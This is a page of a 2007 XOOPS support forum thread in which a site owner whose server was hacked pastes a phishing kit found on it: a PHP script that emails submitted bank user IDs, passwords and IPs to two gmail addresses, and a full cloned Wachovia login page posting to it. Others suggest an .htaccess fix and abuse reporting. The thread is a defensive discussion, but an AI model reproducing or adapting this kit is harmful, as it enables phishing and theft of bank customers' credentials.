XOOPS 
Forum
Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk
  1. Board index / 
  2. XOOPS Community Support forums / 
  3. Beginner's Corner 
  4.  / Open holes and hacked
Register
21
wtravel
Re: Open holes and hacked

Quote:
if i did it in the XOOPS path /www where i have xoops's files, it will be correct ?

That is not correct, it will cause your XOOPS script to stop working and it will make your php files readable (so also mainfile.php, which contains sensitive data).

xgarb says in his post to place the .htaccess file with that code in your uploads folder.
22
dizzymarkus
Re: Open holes and hacked

Ok heres the skinny on how they are gaining access or so I believe.

For some reason they can gain access and get this uploaded which makes it own folder called "seite", once as "module" (instead of modules (9 i caught that one lol) and once an html file in he uploads directory. ( I have since adjusted permisions, changed account password, rechecked main_file.php and added the htaccess that was mentioned here.


I had a wierd file called modules.zip -- I downloaded and looked in it. It had two files --

1. LOGIN.PHP

<<<<<<<<<<<<<<<<<<<code>>>>>>>>>>>>>>>>>>>>>>>>
<?

$ip getenv("REMOTE_ADDR");
$message .= "------------------------------n";
$message .= "User ID: ".$_POST['userid']."n";
$message .= "Password: ".$_POST['password']."n";
$message .= "IP: ".$ip."n";
$message .= "-------Created By Palmers-------n";


$recipient "darkcrews@gmail.com,www.crew@gmail.com";
$subject "WaChoviA";
$headers "From: ";
$headers .= $_POST['eMailAdd']."n";
$headers .= "MIME-Version: 1.0n";
     if (mail($recipient,$subject,$message,$headers))
       {
           header("Location: http://www.wachovia.com");

       }
else
           {
         echo "ERROR! Please go back and try again.";
         }

?>


<<<<<<<<<<<<<<<<<<<<end code>>>>>>>>>>>>>>>>>>>>>>



and an htm file called SERVICE.HTM

<<<<<<<<<<<<<<<<<<<<<<<<<code>>>>>>>>>>>>>>>>>>>>>>>>>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!---->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Mon, 01 Jan 2001 13:00:00 GMT" />
<title>Online Services Account Login</title>
    <link href="https://onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />
    <link href="https://onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />
    <style type="text/css">@import url("/ols/css/interference.css");</style>
    <link href="https://onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />
    <script type="text/javascript" language="JavaScript1.2" src="https://www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>

<script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/utility.js"></script>
<script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/messaging.js"></script>
<script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/login.js"></script>
<script type="text/javascript" language="JavaScript" src="https://onlineservices.wachovia.com/ols/js/bidata.js"></script>
<script type="text/javascript" language="JavaScript">
<!--
if (top != self) {
    top.location=self.location;
}
document.cookie='CookiesAreEnabled=yes; path=/; secure';
window.name="LoginPage";
var timeStamp = new Date().getTime();
//-->
</script>
</head>
<body id="default" class="twocol login" onunload="passReset();enableSubmits();">
<!-- Dual Login Form -->
<form method="post" action="/auth/AuthService" name="dualForm" id="dualForm" onsubmit="return disableSubmits();">
    <input type="hidden" name="action" value="presentLogin" />
    <input type="hidden" name="credtype" value="DUAL" />
        <input type="hidden" name="credtype" value="UID" />
</form>
<div id="limiter">
<div id="header"><img src="https://onlineservices.wachovia.com/ols/images/logo.gif" alt="Wachovia Logo" width="240" height="52" id="logo" /><script type="text/javascript" language="JavaScript">setBrand();</script>
        <img src="https://onlineservices.wachovia.com/ols/images/default_logotype.gif" alt="" width="246" height="21" id="subbrand" />
    </div>
    <div id="pusher">
        <div id="content">
            <div id="main">                
                <h1>Online Services Login</h1>                
                <div id="details">        
                <p>Enter the appropriate login information below, and select your service.</p>                
                </div>                    
                <ul>
                <li>Retirement Plan Participants: <a href="https://commercial.wachovia.com/Online/Financial/Business/Service?action=wrsLogin">Login</a></li>
                </ul>                
                <form method="post" action="login.php" name="uidAuthForm" id="uidAuthForm" onsubmit="return disableSubmits();">
        <input type="hidden" name="credtype" value="UID" />
                <input type="hidden" value="uidLogin" name="action" />
                <input type="hidden" value="" name="bi" />
                <input type="hidden" value="" name="requestTimestamp" />
                <table border="0" cellpadding="0" cellspacing="0" class="formtable">
                <tr>
                    <td class="colgutter"></td>
                    <td class="label"><label for="userid">User ID</label>
                    <td class="colgutter"></td>
                    <td><input type="text" name="userid" id="userid" autocomplete="off" value="" tabindex="1"></td>
                </tr>
                <tr>
                    <td colspan="3"></td>
                    <td>
                        <label for="rememberuid" class="nestinput"><input type="checkbox" name="rememberuid" id="rememberuid" tabindex="6" />Remember my User ID</label>&nbsp;&nbsp;&nbsp;
                        <a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/remember_my_user_id.htm')" tabindex="7" >Learn More</a>
                    </td>
                </tr>
                <tr>
                    <td></td>
                    <td class="label" nowrap="nowrap"><label for="password">Password</label></td>
                    <td class="colgutter"></td>
                    <td><input type="password" name="password" id="password" autocomplete="off" value="" tabindex="2" /></td>
                </tr>
                <tr><td></td><td></td><td></td><td><div class="format">Case Sensitive</div></td></tr>                
                <tr>
                    <td></td>
                    <td class="label" nowrap="nowrap"><label for="service">Service Selection</label></td>
                    <td class="colgutter"></td>
                    <td>
                    <select name="systemtarget"  width="160" onchange="getValue(this.form.name);" tabindex="3">
                        <option value="gotoOSH">Choose a service...</option>
                        <option value="gotoOSH">Online Services Home</option>
                        <option value="gotoBanking">Online Banking</option>
                        <option value="gotoBillPay">Online BillPay</option>
                        <option value="gotoBrokerage">Online Brokerage</option>
                    </select>
                    </td>
                </tr>                
                <tr>
                    <td colspan="4" class="center">
                    
                    <input type="submit" value="Login" tabindex="4" class="button w80" id="submitButton" name="submitButton">
                    </td>
                </tr>
                </table>
                </form>
            </div>
            <div id="related" class="clear">
                <div class="box">
                    <h2><span>Customer Service</span></h2>
                    <h3></h3>
                    <ul>
                        <li><a href="javascript:popWinHelp('https://www.wachovia.com/onlineservices/help/user_id_and_password_rules.htm')">User ID &ampPassword Help</a></li>
                        <li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&amp;nextpage=USERIDLOOKUP&amp;credtype=UID">Forgot your User ID?</a></li>
                        <li><a href="https://onlineservices.wachovia.com/identity/IdentityMgr?action=secondaryPresentLogin&amp;nextpage=PWRESET&amp;returnurl=/auth/AuthService&amp;credtype=UID">Reset your Password</a></li>
                    </ul>
                    
                    <h3></h3>
                    <ul class="small">
                        <li>Customer Access Number: <a href="#" onclick="return submitForm('dualForm');">Login</a></li>
                    </ul>                    
                </div>
                <div id="promo">
                <script type="text/javascript" language="JavaScript">
                <!--
                showMessage("slotA");
                //-->
                </script>
                </div>
            </div>
            <hr class="textonly" />
            <div id="navigation" class="blue">
                <h2 class="ir">Navigation</h2>                
                <div id="utilities" class="utility"></div>        
                <div id="global" class="utility">
                    <ul>                    
                        <li class="first" id="officelocator"><a href="http://www.wachoviasec.com/home/locator.asp" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Office Locator</a></li>
                        <li class="first" id="locations"><a href="http://wachovia.via.infonow.net/locator/?src=OLB" target="locatorwin" onclick="return popWinCust(this.href,'locatorwin','yes','yes','yes','yes','yes','yes','yes',700,450,10,10);">Locations</a></li>
                    </ul>                    
                </div>
            </div>
        </div>
    </div>
    <hr class="textonly" />
    <div id="footer">
        <ul id="footerlinks" class="utility">
            <li class="first"><a href="http://www.wachovia.com/popup/agreement/" target="popupwin" onclick="return popWinStnd(this.href);">Customer Agreement</a></li>
            <li><a href="http://www.wachovia.com/popup/privacy/" target="popupwin" onclick="return popWinStnd(this.href);">Privacy</a></li>
            <li><a href="http://www.wachovia.com/popup/security/" target="popupwin" onclick="return popWinStnd(this.href);">Security</a></li>
            <li><a href="http://www.wachovia.com/popup/legal/" target="popupwin" onclick="return popWinStnd(this.href);">Legal</a></li>
        </ul>
        <div id="copyright">&copy2007 Wachovia CorporationAll rights reserved.</div>
    </div>
    <div id="footeralt">
        <ul id="footerlinks" class="utility">
            <li class="first"><a href="https://wachseconline.wachovia.com/LD_Privacy.html" target="popupwin" onclick="return popWinStnd(this.href);">Privacy</a></li>
            <li><a href="https://wachseconline.wachovia.com/LD_Security.html" target="popupwin" onclick="return popWinStnd(this.href);">Security</a></li>
            <li><a href="https://wachseconline.wachovia.com/LD_AccessOnlineAgree.html" target="popupwin" onclick="return popWinStnd(this.href);">Legal Disclosures</a></li>
            <li><a href="https://wachseconline.wachovia.com/LD_Contact.html" target="popupwin" onclick="return popWinStnd(this.href);">Contact Us</a></li>
        </ul>
        <div id="copyright">&copy2007 Wachovia SecuritiesLLC (member NYSE/SIPC)</div>
        <table id="notmay">
        <caption>Securities and Insurance Products:<caption>
        <tr>
            <td>Not Insured by FDIC or any<br />Federal Government Agency</td>
            <td>May Lose<br />Value</td>
            <td>Not a Deposit of or Guaranteed by<br />a Bank or any Bank affiliate</td>
        </tr>
        </table>
        <div id="disclosure">
        <p>Wachovia Securities is the trade name used by two separateregistered broker-dealers and non-bank affiliates of 
        Wachovia Corporation providing certain retail securities brokerage servicesWachovia SecuritiesLLCmember 
        NYSE/SIPC, and Wachovia Securities Financial NetworkLLCmember <span class="small">NASD</span>/SIPC.  Accounts 
        carried by First ClearingLLCmember NYSE/SIPC.</p>
        <p>Insurance products are offered through non-bank affiliates of Wachovia Corporation and are underwritten by unaffiliated 
        insurance companies.</p>
        </div>
    </div>
</div>
<script language="JavaScript">
<!--
setSelection();
document.uidAuthForm.requestTimestamp.value timeStamp;
setUID('RMUID_1','rememberuid','userid','password');
setData();
//-->
</script>
<!-- BEGIN WEBSIDESTORY CODE v8.0.10 (11up) -->
<!-- COPYRIGHT 1997-2003 WEBSIDESTORYINCALL RIGHTS RESERVEDU.S.PATENT No6,393,479 B1Privacy notice athttp://websidestory.com/privacy -->
<script type="text/javascript" language="JavaScript" id="_hbc">
<!--
var _acct="DM530604BKCA;DM5306045EBV";    //account number(s)
var _pn="Wachovia+UID+Login+Page"//page name(s)
var _mlc="/login"//multi-level content category
var _seg=""// visitor segmentation
var _cmp=""// campaign id
var _gp="";  // campaign goal
var _cmpn="";// campaign id in query
var _gpn=""// campaign goal in query
var _fnl=""// funnels
var _pec=""// error codes
var _fv="";  // form validation function name
var _dcmp="";// dynamic campaign
var _dcmpn="";//dynamic campaign in query
var _hra=""// response attribute
var _hcn=""// conversion
var _hcv=""// conversion value
var _hlt=""// lead tracking
var _hla=""// lead attribute
var _hqsr="";// response attribute in referrer query
var _hqsp="";// response attribute in query
var _hc1=""// custom 1
var _hc2=""// custom 2
var _hc3=""// custom 3
var _hc4=""// custom 4
var _cid=""// customer id
var _cp="null"// campaign
var _cpd=""// campaign domain
var _pndef="title"//default page name
var _ctdef="full"//default content category
var _dlf="n"//download filter
var _elf="n"//exit link filter
var _epg="n"//event page identifier
var _gn="ehg-wachovia.hitbox.com",_mn="we56"//gateway & machine name
//-->
</script>
<script type="text/javascript" language="JavaScript1.1" defer="defer" src="https://www.wachovia.com/metrics/stats.js"></script>
<!-- END WEBSIDESTORY CODE  -->
<!-- Start of DoubleClick Spotlight TagPlease do not remove-->
<!-- Activity Name for this tag is:Online Services Login -->
<!-- Web site URL where tag should be placedhttps://onlineservices.ite.wachovia.com/auth/AuthService?action=presentLogin&url=%2FNASApp%2FNavApp%2FTitanium%3faction=returnHome -->
<!-- This tag must be placed within the opening <bodytag, as close to the beginning of it as possible-->
<!-- Creation Date:07/07/03 -->
<script language="JavaScript">
var axel Math.random()+"";
var axel 10000000000000;
document.write('<img src="https://ad.doubleclick.net/activity;src=800562;type=addit712;cat=onlin441;ord=1;num=''?" width="1" height="1" border="0">');
</script>
<noscript>
<img src="https://ad.doubleclick.net/activity;src=800562;type=addit712;cat=onlin441;ord=1;num=1?" width="1" height="1" border="0">
</noscript>
<!-- End of DoubleClick Spotlight TagPlease do not remove-->
</body>
</html>


<<<<<<<<<<<<<<<<<<<<<<<<<<<<<end code>>>>>>>>>>>>>>>>>>>>>>>


I would appreciate any help given in how to stop this -- apparently I have a three strike rule with my host and I will be asked to go to another server. :0(


Thank you,
Markus
23
dizzymarkus
Re: Open holes and hacked

BUMP.............................

Anyone please?


Thank you
Markus
24
skenow
Re: Open holes and hacked

  • 2007/6/14 1:39

  • skenow

  • Home away from home

  • Posts: 993

  • Since: 2004/11/17


Quote:

dizzymarkus wrote:
Ok heres the skinny on how they are gaining access or so I believe.



How they gain access is still the question. The rest of your post is what they do after they get access.

Where do the folders and files reside? In /uploads or the root?

Shared servers and anonymous ftp access are the biggest possibilities someone has for gaining access - both the responsibilities of your host to secure, imho.
25
vaughan
Re: Open holes and hacked

  • 2007/6/14 7:01

  • vaughan

  • Friend of XOOPS

  • Posts: 680

  • Since: 2005/11/26


btw, you should send that modules.zip & relevant info to googlemail abuse.

report the email addresses used in the script ( $recipient = "darkcrews@gmail.com, www.crew@gmail.com";
)which are gmail addresses. google will then look at the script and determine that they are using gmails service illegally and close their accounts. they may also begin a criminal investigation if they think it's warranted, as they are in their rights to do so.
26
Peekay
Re: Open holes and hacked

  • 2007/6/14 8:45

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Quote:

xgarb wrote:

Stick this in your .htaccess file in any upload directory..

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi 
Options -ExecCGI



If everyone agrees this works, can it be included in the downloads folder for future XOOPS releases? Or perhaps include a suggestion in the 'readme' to use this in all 777 folders.

Should be in the FAQ too.
A thread is for life. Not just for Christmas.
27
dizzymarkus
Re: Open holes and hacked

My bad on the gaining access wording -- lol I was thinking how the "" did they get in while I was typing it :0( SORRY


This has happened three times -- only once has a folder been in the uploads directory the other two it was in the root.( I also added the htaccess in the meantime)

Thank you for the google abuse tip -- I will send it out today to them. :0)

Still am afraid to reopen the site as this is the third strike with my hosting.It happenes again they are gonna lock my account.I never had a problem with previous versions of XOOPS in the last 2 years until now. I even email that person and told them there is no bank info on a free site and nothing is sold -- please remove me from your phishing list. They actually had the balls to return my email with a note "THANKS FOR THE INFO" and thats it. Thanks for all the help you guys are giving.

Markus
28
Peekay
Re: Open holes and hacked

  • 2007/6/14 9:54

  • Peekay

  • XOOPS is my life!

  • Posts: 2335

  • Since: 2004/11/20


Now that you know they are using a valid email address, you should (as Vaughn suggested) complain to Google Mail. Although if Google do decide to take action against the account holder they would have to be quick. I would imagine that dynamic IP addresses make it impossible for Google to block future registrations and the hackers may set up a different g-mail account every week.

If your web root is compromised, it may actually be the host's fault, not yours. An exploit utilising PhpBB was the source of widespread hacks on shared servers a couple of years ago. You didn't need to be running PhpBB on your site to get hacked.

@moderator
Can someone trim the wide code in one of the above posts so this thread is more readable.
A thread is for life. Not just for Christmas.
29
debianus
Re: Open holes and hacked

  • 2007/6/14 10:07

  • debianus

  • Not too shy to talk

  • Posts: 179

  • Since: 2006/12/17


Quote:

Peekay wrote:

If everyone agrees this works, can it be included in the downloads folder for future XOOPS releases? Or perhaps include a suggestion in the 'readme' to use this in all 777 folders.

Should be in the FAQ too.


I agreed; it would be a pity that this wonderful tip to be lost in the forums.
I had posted it in spanish support; other locals support could do it too.
30
Dave_L
Re: Open holes and hacked

  • 2007/6/14 10:52

  • Dave_L

  • XOOPS is my life!

  • Posts: 2277

  • Since: 2003/11/7


[/quote]Stick this in your .htaccess file in any upload directory..

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi 
Options -ExecCGI

[/quote]

What exactly does this do? I've read the Apache documentation, but don't fully understand it.
« 1 2 (3) 4 »

Login

Register now!  |  Lost Password?

Search

Advanced Search

Recent Posts

Who's Online

167 user(s) are online (106 user(s) are browsing Support Forums)

Members: 0

Guests: 167

more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Apr 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits